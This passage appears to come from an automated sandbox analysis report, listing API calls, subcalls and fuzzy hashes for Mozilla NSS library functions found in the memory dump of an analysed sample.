                                                                                • Instruction ID: e4362a4f5d5e0a82233f0fa98b84a1b3bfe7d3d67888f89e6bda50c7e028e3b0
                                                                                • Opcode Fuzzy Hash: 2a59e760c2ff7fca9ab70b173bbe5c1c46575f70dbb4676f2fd856d80adf35ee
                                                                                • Instruction Fuzzy Hash: 2B615DB5E002169BEF10CF68D880BEEBBF1AF48358F154024ED55A7342EB75E945CBA1
                                                                                Function 6CFD2C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(6CFD3F23,?,6CFCE477,?,?,?,00000001,00000000,?,?,6CFD3F23,?), ref: 6CFD2C62
                                                                                • EnterCriticalSection.KERNEL32(0000001C,?,6CFCE477,?,?,?,00000001,00000000,?,?,6CFD3F23,?), ref: 6CFD2C76
                                                                                • PL_HashTableLookup.NSS3(00000000,?,?,6CFCE477,?,?,?,00000001,00000000,?,?,6CFD3F23,?), ref: 6CFD2C86
                                                                                • PR_Unlock.NSS3(00000000,?,?,?,?,6CFCE477,?,?,?,00000001,00000000,?,?,6CFD3F23,?), ref: 6CFD2C93
                                                                                  • Part of subcall function 6D05DD70: TlsGetValue.KERNEL32 ref: 6D05DD8C
                                                                                  • Part of subcall function 6D05DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D05DDB4
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,6CFCE477,?,?,?,00000001,00000000,?,?,6CFD3F23,?), ref: 6CFD2CC6
                                                                                • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6CFCE477,?,?,?,00000001,00000000,?,?,6CFD3F23,?), ref: 6CFD2CDA
                                                                                • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6CFCE477,?,?,?,00000001,00000000,?,?,6CFD3F23), ref: 6CFD2CEA
                                                                                • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6CFCE477,?,?,?,00000001,00000000,?), ref: 6CFD2CF7
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CFCE477,?,?,?,00000001,00000000,?), ref: 6CFD2D4D
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CFD2D61
                                                                                • PL_HashTableLookup.NSS3(?,?), ref: 6CFD2D71
                                                                                • PR_Unlock.NSS3(?), ref: 6CFD2D7E
                                                                                  • Part of subcall function 6CFA07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CF3204A), ref: 6CFA07AD
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF3204A), ref: 6CFA07CD
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CF3204A), ref: 6CFA07D6
                                                                                  • Part of subcall function 6CFA07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CF3204A), ref: 6CFA07E4
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,6CF3204A), ref: 6CFA0864
                                                                                  • Part of subcall function 6CFA07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CFA0880
                                                                                  • Part of subcall function 6CFA07A0: TlsSetValue.KERNEL32(00000000,?,?,6CF3204A), ref: 6CFA08CB
                                                                                  • Part of subcall function 6CFA07A0: TlsGetValue.KERNEL32(?,?,6CF3204A), ref: 6CFA08D7
                                                                                  • Part of subcall function 6CFA07A0: TlsGetValue.KERNEL32(?,?,6CF3204A), ref: 6CFA08FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                • String ID:
                                                                                • API String ID: 2446853827-0
                                                                                • Opcode ID: eab2ef3c2d08248bedf0a9264b9fe08041fc8f3082b866815c1c1dc341852bed
                                                                                • Instruction ID: e64ba08122f745a61ecaa74a6211820660576d4c511adbc1a399dcab38f61b6b
                                                                                • Opcode Fuzzy Hash: eab2ef3c2d08248bedf0a9264b9fe08041fc8f3082b866815c1c1dc341852bed
                                                                                • Instruction Fuzzy Hash: CB51D576D00105ABEB009F24EC45AAAB778FF15258B198524ED1897B11EB32FE64CBE1
                                                                                Function 6CFC7C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_CallOnce.NSS3(6D112120,Function_00097E60,?,?,?,?,?,6D03F9CF,6D03FAD0,00000000), ref: 6CFC7C81
                                                                                  • Part of subcall function 6CF34C70: TlsGetValue.KERNEL32(?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34C97
                                                                                  • Part of subcall function 6CF34C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34CB0
                                                                                  • Part of subcall function 6CF34C70: PR_Unlock.NSS3(?,?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34CC9
                                                                                • TlsGetValue.KERNEL32 ref: 6CFC7CA0
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CFC7CB4
                                                                                • PR_Unlock.NSS3 ref: 6CFC7CCF
                                                                                  • Part of subcall function 6D05DD70: TlsGetValue.KERNEL32 ref: 6D05DD8C
                                                                                  • Part of subcall function 6D05DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D05DDB4
                                                                                • TlsGetValue.KERNEL32 ref: 6CFC7D04
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CFC7D1B
                                                                                • realloc.MOZGLUE(-00000050), ref: 6CFC7D82
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFC7DF4
                                                                                • PR_Unlock.NSS3 ref: 6CFC7E0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
                                                                                • String ID:
                                                                                • API String ID: 2305085145-0
                                                                                • Opcode ID: 53c2d7f059d7472616158b1e3bb3dd7af195eef0c1f7c571e1f110335b2be5b2
                                                                                • Instruction ID: 3b962536881f0b693c25bd19461250018e944ae7ae9c16815975f8704305dcfd
                                                                                • Opcode Fuzzy Hash: 53c2d7f059d7472616158b1e3bb3dd7af195eef0c1f7c571e1f110335b2be5b2
                                                                                • Instruction Fuzzy Hash: 9851F7B2B08102DFDB109F25ED42B6777B5FB43328F15412BDE1547652EBB19460CB92
                                                                                Function 6CF34C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34C97
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34CB0
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34CC9
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34D11
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34D2A
                                                                                • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34D4A
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34D57
                                                                                • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34D97
                                                                                • PR_Lock.NSS3(?,?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34DBA
                                                                                • PR_WaitCondVar.NSS3 ref: 6CF34DD4
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34DE6
                                                                                • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34DEF
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                • String ID:
                                                                                • API String ID: 3388019835-0
                                                                                • Opcode ID: 6b1e6759678ab60b52e83a22feb54b9d9f719d1093d316b0f3508f378e8fd689
                                                                                • Instruction ID: b0c0e509bbc6a2bb053bfce4db039c2da1d3426c41faaa5d3a4c67843279a815
                                                                                • Opcode Fuzzy Hash: 6b1e6759678ab60b52e83a22feb54b9d9f719d1093d316b0f3508f378e8fd689
                                                                                • Instruction Fuzzy Hash: 16418AB2908665DFCB00AF78E584259BFB4FF46314F064669DC989B710EBB198C0CBD1
                                                                                Function 6CFFECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CFFDE64), ref: 6CFFED0C
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFFED22
                                                                                  • Part of subcall function 6D00B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D0E18D0,?), ref: 6D00B095
                                                                                • PL_FreeArenaPool.NSS3(?), ref: 6CFFED4A
                                                                                • PL_FinishArenaPool.NSS3(?), ref: 6CFFED6B
                                                                                • PR_CallOnce.NSS3(6D112AA4,6D0112D0), ref: 6CFFED38
                                                                                  • Part of subcall function 6CF34C70: TlsGetValue.KERNEL32(?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34C97
                                                                                  • Part of subcall function 6CF34C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34CB0
                                                                                  • Part of subcall function 6CF34C70: PR_Unlock.NSS3(?,?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34CC9
                                                                                • SECOID_FindOID_Util.NSS3(?), ref: 6CFFED52
                                                                                • PR_CallOnce.NSS3(6D112AA4,6D0112D0), ref: 6CFFED83
                                                                                • PL_FreeArenaPool.NSS3(?), ref: 6CFFED95
                                                                                • PL_FinishArenaPool.NSS3(?), ref: 6CFFED9D
                                                                                  • Part of subcall function 6D0164F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6D01127C,00000000,00000000,00000000), ref: 6D01650E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                • String ID: security
                                                                                • API String ID: 3323615905-3315324353
                                                                                • Opcode ID: 4a664f26b899eff16d10ed9ab491c0491c866c8205f83539c55b0a41cd1b1f68
                                                                                • Instruction ID: efd92bd5b1b4bc6bc39051692c2ddf37ec390836ea854d46dbc8ed5bc5cb1f7d
                                                                                • Opcode Fuzzy Hash: 4a664f26b899eff16d10ed9ab491c0491c866c8205f83539c55b0a41cd1b1f68
                                                                                • Instruction Fuzzy Hash: EB1189729082147BFA2057A5BC41B7F7278EF42B4CF410535E92863DA2FB24A619C6F7
                                                                                Function 6CFE2CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_InitToken), ref: 6CFE2CEC
                                                                                • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CFE2D07
                                                                                  • Part of subcall function 6D0C09D0: PR_Now.NSS3 ref: 6D0C0A22
                                                                                  • Part of subcall function 6D0C09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6D0C0A35
                                                                                  • Part of subcall function 6D0C09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6D0C0A66
                                                                                  • Part of subcall function 6D0C09D0: PR_GetCurrentThread.NSS3 ref: 6D0C0A70
                                                                                  • Part of subcall function 6D0C09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6D0C0A9D
                                                                                  • Part of subcall function 6D0C09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6D0C0AC8
                                                                                  • Part of subcall function 6D0C09D0: PR_vsmprintf.NSS3(?,?), ref: 6D0C0AE8
                                                                                  • Part of subcall function 6D0C09D0: EnterCriticalSection.KERNEL32(?), ref: 6D0C0B19
                                                                                  • Part of subcall function 6D0C09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6D0C0B48
                                                                                  • Part of subcall function 6D0C09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6D0C0C76
                                                                                  • Part of subcall function 6D0C09D0: PR_LogFlush.NSS3 ref: 6D0C0C7E
                                                                                • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CFE2D22
                                                                                  • Part of subcall function 6D0C09D0: OutputDebugStringA.KERNEL32(?), ref: 6D0C0B88
                                                                                  • Part of subcall function 6D0C09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6D0C0C5D
                                                                                  • Part of subcall function 6D0C09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6D0C0C8D
                                                                                  • Part of subcall function 6D0C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D0C0C9C
                                                                                  • Part of subcall function 6D0C09D0: OutputDebugStringA.KERNEL32(?), ref: 6D0C0CD1
                                                                                  • Part of subcall function 6D0C09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6D0C0CEC
                                                                                  • Part of subcall function 6D0C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D0C0CFB
                                                                                  • Part of subcall function 6D0C09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6D0C0D16
                                                                                  • Part of subcall function 6D0C09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6D0C0D26
                                                                                  • Part of subcall function 6D0C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D0C0D35
                                                                                  • Part of subcall function 6D0C09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6D0C0D65
                                                                                  • Part of subcall function 6D0C09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6D0C0D70
                                                                                  • Part of subcall function 6D0C09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6D0C0D90
                                                                                  • Part of subcall function 6D0C09D0: free.MOZGLUE(00000000), ref: 6D0C0D99
                                                                                • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CFE2D3B
                                                                                  • Part of subcall function 6D0C09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6D0C0BAB
                                                                                  • Part of subcall function 6D0C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D0C0BBA
                                                                                  • Part of subcall function 6D0C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D0C0D7E
                                                                                • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6CFE2D54
                                                                                  • Part of subcall function 6D0C09D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D0C0BCB
                                                                                  • Part of subcall function 6D0C09D0: EnterCriticalSection.KERNEL32(?), ref: 6D0C0BDE
                                                                                  • Part of subcall function 6D0C09D0: OutputDebugStringA.KERNEL32(?), ref: 6D0C0C16
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
                                                                                • API String ID: 420000887-1567254798
                                                                                • Opcode ID: 01c78ebe44f9af3909a0d89531eb6ae02d27eee2dda02299a5c813602edf3863
                                                                                • Instruction ID: 08f1a489f8effbc665d1e70a6c586b72ca74d7aef1476a964e38e5bddd910f7f
                                                                                • Opcode Fuzzy Hash: 01c78ebe44f9af3909a0d89531eb6ae02d27eee2dda02299a5c813602edf3863
                                                                                • Instruction Fuzzy Hash: EE2129B5540205FFEB20DF55EE4AB593BB1EB4B31DF048015FA1893262EBF28814CB62
                                                                                Function 6D024DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_NewArena_Util.NSS3(00000400), ref: 6D024DCB
                                                                                  • Part of subcall function 6D010FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CFB87ED,00000800,6CFAEF74,00000000), ref: 6D011000
                                                                                  • Part of subcall function 6D010FF0: PR_NewLock.NSS3(?,00000800,6CFAEF74,00000000), ref: 6D011016
                                                                                  • Part of subcall function 6D010FF0: PL_InitArenaPool.NSS3(00000000,security,6CFB87ED,00000008,?,00000800,6CFAEF74,00000000), ref: 6D01102B
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6D024DE1
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D0110F3
                                                                                  • Part of subcall function 6D0110C0: EnterCriticalSection.KERNEL32(?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01110C
                                                                                  • Part of subcall function 6D0110C0: PL_ArenaAllocate.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011141
                                                                                  • Part of subcall function 6D0110C0: PR_Unlock.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011182
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01119C
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6D024DFF
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D024E59
                                                                                  • Part of subcall function 6D00FAB0: free.MOZGLUE(?,-00000001,?,?,6CFAF673,00000000,00000000), ref: 6D00FAC7
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D0E300C,00000000), ref: 6D024EB8
                                                                                • SECOID_FindOID_Util.NSS3(?), ref: 6D024EFF
                                                                                • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6D024F56
                                                                                • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D02521A
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                • String ID:
                                                                                • API String ID: 1025791883-0
                                                                                • Opcode ID: 15f97b378d4e77f162c11d688a91b914a12213a2ca7e6e06098053f6753a5d8e
                                                                                • Instruction ID: 831a2eb5ffd36a98076a24a749432c64b82487706746ad79d208e74c2866286b
                                                                                • Opcode Fuzzy Hash: 15f97b378d4e77f162c11d688a91b914a12213a2ca7e6e06098053f6753a5d8e
                                                                                • Instruction Fuzzy Hash: 4AF1AD75E0520ADBEB08CF54D8807BDB7F2BF88314F158129E914AB285E775E981CF90
                                                                                Function 6D020C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SECOID_GetAlgorithmTag_Util.NSS3(6D022C2A), ref: 6D020C81
                                                                                  • Part of subcall function 6D00BE30: SECOID_FindOID_Util.NSS3(6CFC311B,00000000,?,6CFC311B,?), ref: 6D00BE44
                                                                                  • Part of subcall function 6CFF8500: SECOID_GetAlgorithmTag_Util.NSS3(6CFF95DC,00000000,00000000,00000000,?,6CFF95DC,00000000,00000000,?,6CFD7F4A,00000000,?,00000000,00000000), ref: 6CFF8517
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D020CC4
                                                                                  • Part of subcall function 6D00FAB0: free.MOZGLUE(?,-00000001,?,?,6CFAF673,00000000,00000000), ref: 6D00FAC7
                                                                                • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6D020CD5
                                                                                • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6D020D1D
                                                                                • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6D020D3B
                                                                                • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6D020D7D
                                                                                • free.MOZGLUE(00000000), ref: 6D020DB5
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D020DC1
                                                                                • free.MOZGLUE(00000000), ref: 6D020DF7
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D020E05
                                                                                • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6D020E0F
                                                                                  • Part of subcall function 6CFF95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CFD7F4A,00000000,?,00000000,00000000), ref: 6CFF95E0
                                                                                  • Part of subcall function 6CFF95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CFD7F4A,00000000,?,00000000,00000000), ref: 6CFF95F5
                                                                                  • Part of subcall function 6CFF95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CFF9609
                                                                                  • Part of subcall function 6CFF95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CFF961D
                                                                                  • Part of subcall function 6CFF95C0: PK11_GetInternalSlot.NSS3 ref: 6CFF970B
                                                                                  • Part of subcall function 6CFF95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CFF9756
                                                                                  • Part of subcall function 6CFF95C0: PK11_GetIVLength.NSS3(?), ref: 6CFF9767
                                                                                  • Part of subcall function 6CFF95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CFF977E
                                                                                  • Part of subcall function 6CFF95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CFF978E
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                • String ID:
                                                                                • API String ID: 3136566230-0
                                                                                • Opcode ID: 2800040d0888ef723d56f0179e90ff0e204cd7c8ca42a5ce7f5d0d4c55b625af
                                                                                • Instruction ID: ea27a106fb6642ac8a67034391db1de593332b414bc529860ba2cf2f344b4855
                                                                                • Opcode Fuzzy Hash: 2800040d0888ef723d56f0179e90ff0e204cd7c8ca42a5ce7f5d0d4c55b625af
                                                                                • Instruction Fuzzy Hash: FD41B2B1D06206ABFB009F61DC45BBF7AB4FF45308F054028E91557751EB75AA14CBE2
                                                                                Function 6CFCFCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
